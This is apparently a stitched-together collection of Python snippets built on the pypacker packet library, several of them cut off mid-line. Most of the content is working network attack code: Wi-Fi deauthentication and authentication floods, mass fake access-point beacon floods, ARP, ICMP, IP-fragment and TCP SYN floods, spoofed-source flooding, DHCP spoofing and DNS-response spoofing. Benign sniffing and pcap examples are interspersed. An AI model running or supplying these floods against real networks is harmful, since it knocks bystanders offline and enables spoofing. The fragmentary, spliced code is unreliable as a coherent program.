def wifi_authdos_cb(pargs):
"""
Authentication frames DoS
"""
radiotap_ieee80211 = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0)
auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst)
radiotap_ieee80211_auth = radiotap_ieee80211 + auth
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
channel = int(pargs.channels.split(",")[0])
logger.debug("sending %d deauth to %r on channel %d", pargs.count,
pargs.mac_dst, channel)
utils.switch_wlan_channel(pargs.iface_name,
int(pargs.channels.split(",")[0]))
for cnt in range(pargs.count):
if cnt & 15 == 0:
print(".", end="")
sys.stdout.flush()
auth.src = pypacker.get_rnd_mac()
try:
psock_send.send(radiotap_ieee80211_auth.bin())
except socket.timeout:
# timeout on sending? that's ok
pass
print("")
psock_send.close()
def arp_cb(pargs):
"""ARP DoS, eg for switches"""
#logger.debug("%s %s %s %s", pargs.mac_src, pargs.mac_dst, pargs.ip_src, pargs.ip_dst)
pkt_arp_req = ethernet.Ethernet(dst=b"\xFF" * 6, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha=b"\xFF" * 6, tpa_s=pargs.ip_dst,
op=arp.ARP_OP_REQUEST)
pkt_arp_resp = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) + \
arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha_s=pargs.mac_dst, tpa_s=pargs.ip_dst,
op=arp.ARP_OP_REPLY)
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
for cnt in range(pargs.count):
# request from various sources
mac = pypacker.get_rnd_mac()
pkt_arp_req.src = mac
pkt_arp_req.arp.sha = mac
pkt_arp_req.arp.spa = pypacker.get_rnd_ipv4()
psock.send(pkt_arp_req.bin())
# response from various sources
mac = pypacker.get_rnd_mac()
pkt_arp_resp.src = mac
pkt_arp_resp.arp.sha = mac
pkt_arp_resp.arp.spa = pypacker.get_rnd_ipv4()
psock.send(pkt_arp_resp.bin())
psock.close()
def cpu_port_sniffer(self):
self.routing_table = {} # prefix -> AS
self.quarantined = {} # (AS, prefix) -> quarantine expire time
self.blocked_as = []
self.allowed = [] # (AS, prefix)
psock = psocket.SocketHndl(timeout=999999, iface_name=_CPU_PORT_VETH)
while self.running:
for raw in psock:
self.cpu_port_handler(raw, psock)
def icmp_cb(pargs):
"""ICMP DoS"""
pkt_icmpreq = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) +\
ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst, p=ip.IP_PROTO_ICMP) +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"A" * 1460)
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
for cnt in range(pargs.count):
psock.send(pkt_icmpreq.bin())
psock.close()
def send_pkt(pkt_num):
ips = []
for i in range(0, pkt_num):
ips.append(str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)))
while True:
for i in range(0, pkt_num):
src_ip = ips[i]
print('src ip : ' + src_ip)
packet_ip = ip.IP(src_s=src_ip, dst_s="192.168.10.1") + tcp.TCP(dport=8888)
psock = psocket.SocketHndl(mode=psocket.SocketHndl.MODE_LAYER_3, timeout=10)
psock.send(packet_ip.bin(), dst=packet_ip.dst_s)
time.sleep(0.001)
psock.close()
def readndump_network(file_name="bugpackets.pcap", iface_name="lo"):
#print("will store bug-packets to: %s" % file_name)
pcap_writer = ppcap.Writer(filename=file_name)
psock = psocket.SocketHndl(iface_name=iface_name, timeout=999999)
try:
for bts in psock:
pass_or_dump(bts, pcap_writer)
except KeyboardInterrupt:
pass
pcap_writer.close()
psock.close()
def start_collecting(self, queue_size=100000, read_timeout_sec=1):
if self._collect_proc is not None:
logger.debug("collect process already started")
return
#self._packet_queue = SimpleQueue()
self._packet_queue = Queue(maxsize=queue_size)
self._sockethndl = psocket.SocketHndl(iface_name=self._iface_name,
timeout=read_timeout_sec,
buffersize_recv=2**29)
self._collect_proc = Process(target=PacketCollector._collect_cycler,
args=(self._sockethndl,
self._packet_queue))
logger.debug("starting packet collector")
self._collect_proc.start()
def ip_cb(pargs):
"""
IP fragment DOS
"""
eth_l = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src)
ip_l = ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst)
ip_l.body_bytes = b"A" * 4000
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
ip_frags = ip_l.create_fragments(fragment_len=8)
for cnt in range(pargs.count):
for ip_frag in ip_frags:
eth_l.upper_layer = ip_frag
psock.send(eth_l.bin())
psock.close()
def set_state(self, state_active=True):
if self._state_active == state_active:
# nothing changed
logger.warning("no new state, doing nothing")
return
if not state_active:
self._state_active = False
self._socket.close()
else:
logger.debug("opening socket")
self._socket = psocket.SocketHndl(iface_name=self._iface_name)
self._responder_thread = threading.Thread(
target=KnockLogic._listen_cycler,
args=[self, self._socket])
self._state_active = True
self._responder_thread.start()
def tcp_cb(pargs):
"""TCP DoS"""
iptables_rules_info = """
iptables -I OUTPUT -p tcp --tcp-flags ALL RST,ACK -j DROP
iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP
iptables -I INPUT -p tcp --tcp-flags ALL RST -j DROP
"""
logger.info("For best performance set set these rules: %s",
iptables_rules_info)
pkt_tcp_syn = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) +\
ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst, p=ip.IP_PROTO_TCP) +\
tcp.TCP(sport=12345, dport=pargs.port_dst)
# Use raw sockets to circumvent network stack
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
is_running = True
def answer_cycler():
def filter_cb(pkt):
try:
return pkt.ip.tcp.flags == tcp.TH_SYN | tcp.TH_ACK
except Exception as ex:
#logger.warning(ex)
pass
return False
while is_running:
try:
pkt_rsp = psock_rcv.recvp(filter_match_recv=filter_cb)[0]
#logger.debug("got SYN,ACK: %r", pkt_rsp)
except IndexError:
logger.debug("no packets..")
continue
pkt_rsp.reverse_all_address()
tcp_l = pkt_rsp.ip.tcp
tcp_l.flags = tcp.TH_ACK
tcp_l.seq, tcp_l.ack = tcp_l.ack, tcp_l.seq
tcp_l.ack += 1
psock_rcv.send(pkt_rsp.bin())
answer_thread = threading.Thread(target=answer_cycler)
answer_thread.start()
randrange = random.randrange
tcp_l = pkt_tcp_syn.ip.tcp
logger.debug("sending...")
input = 0x31CE
#for cnt in range(pargs.count):
for sport in range(0, 65536):
tcp_l.seq = randrange(1000, 123123)
tcp_l.sport = sport ^ input
psock_send.send(pkt_tcp_syn.bin())
print("\rsent %d syn" % sport, end="")
#time.sleep(0.0001)
print()
logger.debug("finished")
is_running = False
time.sleep(999)
psock_send.close()
psock_rcv.close()
from pypacker import psocket
IFACE = "wlan0"
MAC_SRC = "00:13:e8:63:f3:8f"
MAC_DST = "24:65:11:85:E9:AC"
IP_SRC = "192.168.178.26"
FILE_IP_DST = sys.argv[2]
print("destination IP addresses file: %s" % FILE_IP_DST)
IP_DST = open(FILE_IP_DST, "r").read().split("\n")[:-1]
print("amount addresses: %d" % len(IP_DST))
REPITITIONS = int(sys.argv[1])
print("repititiona: %d" % REPITITIONS)
psock_req = psocket.SocketHndl(iface_name=IFACE,
mode=psocket.SocketHndl.MODE_LAYER_2)
tcp_syn = ethernet.Ethernet(dst_s=MAC_DST, src_s=MAC_SRC) +\
ip.IP(src_s=IP_SRC, dst_s="127.0.0.1", p=ip.IP_PROTO_TCP) +\
tcp.TCP(sport=12345, dport=1337)
print("%r" % tcp_syn)
ip = tcp_syn.ip
tcp = tcp_syn.ip.tcp
randrange = random.randrange
for x in range(REPITITIONS):
if x % 10000 == 0:
print("sent %d" % x)
ip_dst_str = IP_DST[randrange(0, len(IP_DST))]
try:
ip.dst_s = ip_dst_str
from pypacker import pypacker, utils
from pypacker.layer12 import radiotap, ieee80211
from pypacker import psocket
# name of monitor interface to use
wlan_monitor_if = sys.argv[1]
# MAC address of access point
ap_mac = sys.argv[2]
print("interface/ap: %s %s" % (wlan_monitor_if, ap_mac))
utils.set_wlan_monmode(wlan_monitor_if, monitor_active=False, reactivate=False)
utils.set_ethernet_address(wlan_monitor_if, "24:77:03:01:5C:8D")
utils.set_wlan_monmode(wlan_monitor_if, monitor_active=True)
psocket = psocket.SocketHndl(wlan_monitor_if)
auth_req_orig = radiotap.Radiotap() +\
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0) +\
ieee80211.IEEE80211.Auth(dst_s=ap_mac, bssid_s=ap_mac)
beacon_orig = radiotap.Radiotap() +\
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) +\
ieee80211.IEEE80211.Beacon(
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")]
)
def sniffer():
psock = psocket.SocketHndl(timeout=999999, iface_name = TARGET_IFACE)
for pkt in psock:
eth = Ether(pkt)
if eth.type == 0x88b5 and eth.dst == local_mac:
process_pkt(eth)
def wifi_ap_cb(pargs):
"""
Create a massive amount of fake APs
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
beacon_orig = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
ieee80211.IEEE80211.Beacon(
dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")])
beacon = copy.deepcopy(beacon_orig)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
essid = "FreeHotspot"
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = bytes(essid, "ascii")
_beacon.params[0].len = len(essid)
_beacon.params[2].body_bytes = pack_B(channels[0])
_beacon.seq = 0
_beacon.interval = 0xFFFF
# adaptive sleeptime due to full buffer on fast sending
sleeptime = 0.000001
rand_mac = True
rand_essid = True
pargs.is_running = True
logger.info("faking APs on the following channels %r", channels)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
cnt = 0
rounds = 0
PACKETS_PER_CHANNEL = 3
starttime = time.time()
_beacon.params[2].body_bytes = pack_B(channels[0])
utils.switch_wlan_channel(pargs.iface_name, channels[0])
for _ in range(pargs.count):
if not pargs.is_running:
break
if cnt & 0xF == 0:
print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="")
sys.stdout.flush()
if time.time() - starttime > 60:
rounds += 1
cnt = 0
cnt_bts = unpack_I(cnt)[0][-3:]
cnt += 1
if rand_mac:
mac = pypacker.get_rnd_mac()[:3] + cnt_bts
_beacon.src = mac
_beacon.bssid = mac
if rand_essid:
_beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts
_beacon.params[0].len = len(_beacon.params[0].body_bytes)
try:
_beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL
_beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL
for cnt_ap in range(PACKETS_PER_CHANNEL):
# send multiple beacons for every ap
psock_send.send(beacon.bin())
_beacon.seq += 1
_beacon.ts += 0x100
#time.sleep(sleeptime)
except socket.timeout:
# timeout on sending? that's ok
pass
except OSError:
sleeptime *= 10
print()
logger.warning("buffer full, new sleeptime: %03.6fs, waiting...",
sleeptime)
time.sleep(1)
psock_send.close()
psock_req = psocket.SocketHndl(iface_name=IFACE, mode=psocket.SocketHndl.MODE_LAYER_3)
dns_req = ip.IP(src_s=IP_SRC, dst_s="192.168.178.1", p=ip.IP_PROTO_UDP) +\
UDP(sport=12345, dport=53) +\
dns.DNS(id=12, questions_amount=1, addrr_amount=1,
queries=dns.DNS.Query(name=b"www.pr0gramm.com"))
answer = psock_req.sr(dns_req)[0][dns.DNS]
print("answer is: %s" % answer)
psock_req.close()
"""
#
# spoof DNS response
#
print("waiting for DNS request")
psock = psocket.SocketHndl(iface_name=IFACE, timeout=600)
filter = lambda p: p[dns.DNS] is not None and p[ip.IP].src_s == IP_SRC
answer = psock.recvp(filter_match_recv=filter)[0]
answer_dns = answer[dns.DNS]
print("got DNS packet: %s" % answer_dns)
dns_answer_send = answer.create_reverse()
layer_dns = dns_answer_send[dns.DNS]
layer_dns.id = answer_dns.id
layer_dns.flags = 0x8180
layer_dns.queries = answer_dns.queries[0]
layer_dns.answers = dns.DNS.Answer(
address=pypacker.ip4_str_to_bytes("173.194.70.1"))
# layer_dns.addrecords = answer_dns.addrecords[0]
layer_dns.addrecords = dns.DNS.AddRecord()
import socket
import pypacker.pypacker as pypacker
from pypacker.pypacker import Packet
from pypacker import psocket
from pypacker.layer12 import arp, ethernet, ieee80211, prism
from pypacker.layer3 import ip, icmp
psock = psocket.SocketHndl(iface_name="lo0",
mode=psocket.SocketHndl.MODE_LAYER_2,
timeout=10)
# send ARP request
arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2",
tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1")
psock.send(arpreq.bin())
# send ICMP request
icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890")
psock.send(icmpreq.bin())
Check for unparsable files retrieved via network and save them to "parsefail.pcap"
"""
import sys
import time
import socket
from pypacker import psocket, ppcap, utils
from pypacker.layer12 import ethernet, linuxcc, radiotap
from pypacker.layer3 import ip
iface = sys.argv[1]
print("opening (wlan?) interface: %s" % iface)
utils.set_wlan_monmode(iface)
sockhndl = psocket.SocketHndl(iface_name=iface)
pcapwriter = ppcap.Writer(filename="parsefail.pcap",
linktype=ppcap.DLT_IEEE802_11_RADIO)
# pcapwriter = ppcap.Writer(filename="parsefail.pcap")
raw_bytes = b""
cnt = 0
time_start = time.time()
while True:
if cnt % 1000 == 0:
print("%d pps" % (cnt / (time.time() - time_start)))
cnt = 0
time_start = time.time()
cnt += 1
try:
def wifi_ap_ie_cb(pargs):
"""
Create fake APs using various IEs
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
beacon_orig = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
ieee80211.IEEE80211.Beacon(
dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"),
ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16),
]
)
beacon = copy.deepcopy(beacon_orig)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
essid = "012"
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = bytes(essid, "ascii")
_beacon.params[0].len = len(essid)
_beacon.params[2].body_bytes = pack_B(channels[0])
_beacon.seq = 0
# adaptive sleeptime due to full buffer on fast sending
sleeptime = 0.000001
pargs.is_running = True
logger.info("faking APs on the following channels %r", channels)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
ie_cnt = 0
pkt_cnt = 0
PACKETS_PER_CHANNEL = 3
for _ in range(pargs.count):
if not pargs.is_running:
break
for channel in channels:
if pkt_cnt % (256) == 0:
print("%d packets sent, ch: %d \r" % (pkt_cnt, channel),
end="")
sys.stdout.flush()
_beacon.params[2].body_bytes = pack_B(channel)
utils.switch_wlan_channel(pargs.iface_name, channel)
#logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes)
pkt_cnt += 256
try:
for ie_id in range(256):
_beacon.params[5].id = ie_id
mac = pypacker.get_rnd_mac()
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = get_random_essid()
_beacon.params[0].len = len(_beacon.params[0].body_bytes)
for _ in range(PACKETS_PER_CHANNEL):
_beacon.seq = ie_id
# _beacon.ts = x << (8*7)
_beacon.ts = ie_id * 20
# time.sleep(0.01)
psock_send.send(beacon.bin())
time.sleep(sleeptime)
except socket.timeout:
# timeout on sending? that's ok
pass
except OSError:
sleeptime *= 10
print()
logger.warning(
"buffer full, new sleeptime: %03.6fs, waiting...",
sleeptime)
time.sleep(1)
ie_cnt = (ie_cnt + 1) & 0xFF
psock_send.close()
pcap = ppcap.Reader(filename="packets_ether.pcap")
cnt = 0
for ts, buf in pcap:
cnt += 1
eth = ethernet.Ethernet(buf)
if eth[tcp.TCP] is not None:
print("%d: %s:%s -> %s:%s" % (ts, eth[ip.IP].src_s, eth[tcp.TCP].sport,
eth[ip.IP].dst_s, eth[tcp.TCP].dport))
pcap.close()
#
# send/receive packets to/from network using raw sockets
#
try:
psock = psocket.SocketHndl(timeout=10)
print("please do a ping to localhost to receive bytes!")
raw_bytes = psock.recv()
print(ethernet.Ethernet(raw_bytes))
psock.close()
except socket.error as e:
print("you need to be root to execute the raw socket-examples!")
# read 802.11 packets from wlan monitor interface
# command to create/remove interface (replace wlanX with your managed wlan-interface):
# iw dev [wlanX] interface add mon0 type monitor
# iw dev [wlanX] interface del
try:
wlan_reader = psocket.SocketHndl(wlan_monitor_if)
print("please wait for wlan traffic to show up")
def wifi_deauth_cb(pargs):
"""
Deauth everyone and everything
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
logger.debug("using channels: %r", channels)
psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2,
timeout=1)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
# {channel : {b"AP" : set(b"clients", ...)}}
wdata = collections.defaultdict(lambda: collections.defaultdict(set))
# thread: socket1: listen for traffic, extract ap/client macs
def listen_cycler(pargs_ref):
while pargs_ref.is_running:
try:
rtap = psock_rcv.recvp(lowest_layer=radiotap.Radiotap)[0]
except (IndexError, socket.timeout, OSError):
logger.debug("no packets received..")
continue
try:
pkt_ieee80211 = rtap.ieee80211
except Exception as ex:
logger.warning(ex)
# TODO: use channel info from radiotap?
if pkt_ieee80211.is_beacon():
bssid = pkt_ieee80211.beacon.bssid
if bssid in pargs.macs_excluded:
#logger.debug("excluding AP: %r", bssid)
continue
# don't overwrite already stored client MACs
if bssid not in wdata[pargs.current_channel]:
# logger.debug("new AP: %r %s", bssid, utils.get_vendor_for_mac(bssid))
wdata[pargs.current_channel][bssid] = set()
for client in pkt_ieee80211.extract_client_macs():
bssid = pkt_ieee80211.upper_layer.bssid
if bssid in pargs.macs_excluded:
#logger.debug("excluding AP: %r", bssid)
continue
if client in pargs.macs_excluded or\
client in wdata[pargs.current_channel][bssid]:
#logger.debug("excluding client: %r", bssid)
continue
# logger.debug("new client: %r %s", client, utils.get_vendor_for_mac(client))
wdata[pargs.current_channel][bssid].add(client)
pargs.is_running = True
pargs.current_channel = channels[0]
layer_radiotap = radiotap.Radiotap()
layer_iee80211 = ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE,
subtype=ieee80211.M_DEAUTH)
layer_deauth = ieee80211.IEEE80211.Deauth()
pkt_deauth = layer_radiotap + layer_iee80211 + layer_deauth
thread_listen = threading.Thread(target=listen_cycler, args=[pargs])
thread_listen.start()
logger.info("first round slow start..")
for cnt in range(pargs.count):
seq = 0
layer_deauth.seq = seq
if not pargs.is_running:
break
for channel in channels:
# skip non-traffic channels
if cnt > 0 and len(wdata[channel]) == 0:
#logger.debug("skipping channel %d", channel)
continue
utils.switch_wlan_channel(pargs.iface_name, channel)
pargs.current_channel = channel
try:
time.sleep(0.4 if cnt == 0 else 0.05)
except KeyboardInterrupt:
pargs.is_running = False
break
logger.info(
"deauth on channel %3d (%3d APs, %3d clients, round %4d)",
channel, len(wdata[channel]),
sum(len(clients) for ap, clients in wdata[channel].items()),
cnt)
# TODO: quite slow
aps = list(wdata[channel].keys())
for mac_ap, macs_clients in [[ap, wdata[channel][ap]]
for ap in aps]:
layer_deauth.seq += 1
layer_deauth.src = mac_ap
layer_deauth.bssid = mac_ap
if not pargs.nobroadcast:
# reset src/dst for broadcast
layer_deauth.dst = b"\xFF" * 6
# TODO: increase?
# logger.debug("deauth AP: %r", mac_ap)
for _ in range(5):
layer_deauth.seq += 1
psock_send.send(pkt_deauth.bin())
for mac_client in list(macs_clients):
# logger.debug("deauth client: %r", mac_client)
layer_deauth.dst = mac_client
for _ in range(2):
layer_deauth.seq += 1
psock_send.send(pkt_deauth.bin())
psock_send.close()
psock_rcv.close()
from time import sleep
from random import uniform
import os
os.system("ethtool -K HA0-eth0 tx off")
TARGET_DEST = '10.0.0.1'
DEBUG = True
def log(s):
if DEBUG:
print(s)
send_sock = psocket.SocketHndl(timeout=999999, iface_name='HA0-eth0')
def send_packet():
pkt = Ether() / IP(dst=TARGET_DEST, ttl=64, proto=6)
send_sock.send(bytes(pkt))
def send_some_packets(rate, duration):
n = rate * duration
for i in range(n):
send_packet()
# Introduce some variance - otherwise the standard deviation is super small.
sleep(uniform(0.8, 1.2) / rate)
import time
# interface to listen on
IFACE = "wlan0"
#
# spoof DHCP request
#
dhcp_param = [dhcp.DHCP_OPT_NETMASK, dhcp.DHCP_OPT_ROUTER, dhcp.DHCP_OPT_DNS_SVRS, dhcp.DHCP_OPT_NISTIMESERV]
dhcp_spoof = ethernet.Ethernet(src_s="20:16:d8:ef:1f:49", dst_s="ff:ff:ff:ff:ff:ff") +\
ip.IP(src_s="0.0.0.0", dst_s="255.255.255.255", p=ip.IP_PROTO_UDP, id=1) +\
udp.UDP(sport=68, dport=67) +\
dhcp.DHCP(chaddr=pypacker.mac_str_to_bytes("20:16:d8:ef:1f:49") + b"\x00" * 10,
xid=0,
opts=[
dhcp.DHCPOptMulti(type=dhcp.DHCP_OPT_MSGTYPE, len=3, body_bytes=b"\x01"),
dhcp.DHCPOptSingle(type=0xff)
]
)
psock = psocket.SocketHndl(iface_name=IFACE)
for a in range(9):
print("sending DHCP request")
psock.send(dhcp_spoof.bin())
mac = "08:9e:01:dd:ee:f%d" % a
dhcp_spoof.src_s = mac
dhcp_spoof.chaddr = pypacker.mac_str_to_bytes(mac) + b"\x00" * 10
time.sleep(1)
psock.close()
pcap = ppcap.Reader(filename="packets_ether.pcap")
cnt = 0
for ts, buf in pcap:
cnt += 1
eth = ethernet.Ethernet(buf)
if eth[tcp.TCP] is not None:
print("%d: %s:%s -> %s:%s" % (ts, eth[ip.IP].src_s, eth[tcp.TCP].sport,
eth[ip.IP].dst_s, eth[tcp.TCP].dport))
pcap.close()
#
# send/receive packets to/from network using raw sockets
#
try:
psock = psocket.SocketHndl(timeout=10)
print("please do a ping to localhost to receive bytes!")
raw_bytes = psock.recv()
print(ethernet.Ethernet(raw_bytes))
psock.close()
except socket.error as e:
print("you need to be root to execute the raw socket-examples!")
# read 802.11 packets from wlan monitor interface
# command to create/remove interface (replace wlanX with your managed wlan-interface):
# iw dev [wlanX] interface add mon0 type monitor
# iw dev [wlanX] interface del
try:
wlan_reader = psocket.SocketHndl(wlan_monitor_if)
print("please wait for wlan traffic to show up")
import sys
import time
import socket
from pypacker import psocket, ppcap, utils
from pypacker.layer12 import ethernet, linuxcc, radiotap
from pypacker.layer3 import ip
from pypacker.layer4 import tcp
from pypacker.layer567 import http
iface = sys.argv[1]
#print("opening (wlan?) interface: %s" % iface)
#utils.set_wlan_monmode(iface)
sockhndl = psocket.SocketHndl(iface_name=iface, timeout=99999)
#pcapwriter = ppcap.Writer(filename="parsefail.pcap", linktype=ppcap.DLT_IEEE802_11_RADIO)
pcapwriter = ppcap.Writer(filename="parsefail.pcap")
raw_bytes = b""
cnt = 0
time_start = time.time()
for bts in sockhndl:
if cnt % 1000 == 0:
print("%d pps" % (cnt / (time.time() - time_start)))
time_start = time.time()
cnt = 0
cnt += 1
try:
import queue
from pypacker.layer12 import ethernet
from pypacker.layer3 import ip
from pypacker.layer4 import tcp
from pypacker import psocket
IFACE_NAME = "wlan0"
MAC_SRC = "00:11:22:33:44:55" # MAC address of IFACE_NAME
MAC_DST = "00:11:22:33:44:56" # MAC address of target or router
IP_SRC = "192.168.178.53" # IP address of IFACE_NAME
IP_DST = "192.168.178.1" # IP address of target
PORT_SRC = 12345
TCP_SEQ = 1337
sock_rcv = psocket.SocketHndl(iface_name=IFACE_NAME)
sock_send = psocket.SocketHndl(iface_name=IFACE_NAME)
open_ports = queue.Queue()
def filter_pkt(pkt):
tcp_pkt = pkt[tcp.TCP]
if tcp_pkt is None or\
tcp_pkt.dport != PORT_SRC or\
tcp_pkt.flags != (tcp.TH_SYN | tcp.TH_ACK) or\
tcp_pkt.ack != TCP_SEQ + 1:
return False
open_ports.put(tcp_pkt.sport)
return True
from pypacker import psocket from pypacker.layer12 import ethernet from pypacker.layer3 import ip, icmp # send ICMP request psock = psocket.SocketHndl(iface_name="wlan0") icmpreq = ethernet.Ethernet(src_s="20:16:d8:ef:1f:49", dst_s="24:65:11:85:e9:00", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.178.27", dst_s="192.168.178.24") +\ icmp.ICMP(type=8) +\ icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890") psock.send(icmpreq.bin())
from pypacker import utils
import logging
logger = logging.getLogger("pypacker")
#
# sanity checks
#
if len(sys.argv) < 2:
print("pleace specify an interface as 1st parameter")
sys.exit(1)
iface = sys.argv[1]
utils.set_wlan_monmode(iface, monitor_active=True)
psock = psocket.SocketHndl(iface_name=iface, timeout=0.5)
channels = utils.get_available_wlan_channels(iface)
if len(channels) == 0:
# set default channels
channels = [ch for ch in range(1, 12)]
print("got som' channels: %r" % str(channels))
Base = declarative_base()
#
# data schemes
#
class Station(Base):
__tablename__ = 'station'
"""802.11 beacon fetcher"""
from pypacker import psocket
from pypacker.layer12 import ieee80211, radiotap
import time
wlan_monitor_if = "wlan1"
wlan_reader = psocket.SocketHndl(iface_name=wlan_monitor_if, timeout=999)
print("please wait for wlan traffic to show up")
aps_found = {}
time_start = time.time()
for i in range(100000):
raw_bytes = wlan_reader.recv()
drvinfo = radiotap.Radiotap(raw_bytes)
if i % 1000 == 0:
print("packets/s: %d" % (i / (time.time() - time_start)))
try:
beacon = drvinfo[ieee80211.IEEE80211.Beacon]
if beacon is None:
continue
mac_ap = beacon.src1_s
# print(beacon)
ie_ssid = beacon.params[0].data
TARGET_IFACE = conf.iface #'H1-eth0'
DELAY_MSEC = 7.5
ERROR_THRESHOLD = 1
RANGE_ABS_MAX = 255
NODELAY_TEST = True
ifaces = get_if_list()
if TARGET_IFACE not in ifaces:
print('Could not find interface {}. Check TARGET_IFACE exists on the host.'.format(TARGET_IFACE))
#conf.iface = TARGET_IFACE
local_mac = get_if_hwaddr(TARGET_IFACE)
send_sock = psocket.SocketHndl(timeout=999999, iface_name = TARGET_IFACE)
run = True
values = []
freq = {}
cache = []
def compute_var(nx):
return np.var(nx)
def compute_std(nx):
return np.std(nx)
def compute_values():
n = len(freq.keys())
vals = list(freq.values())
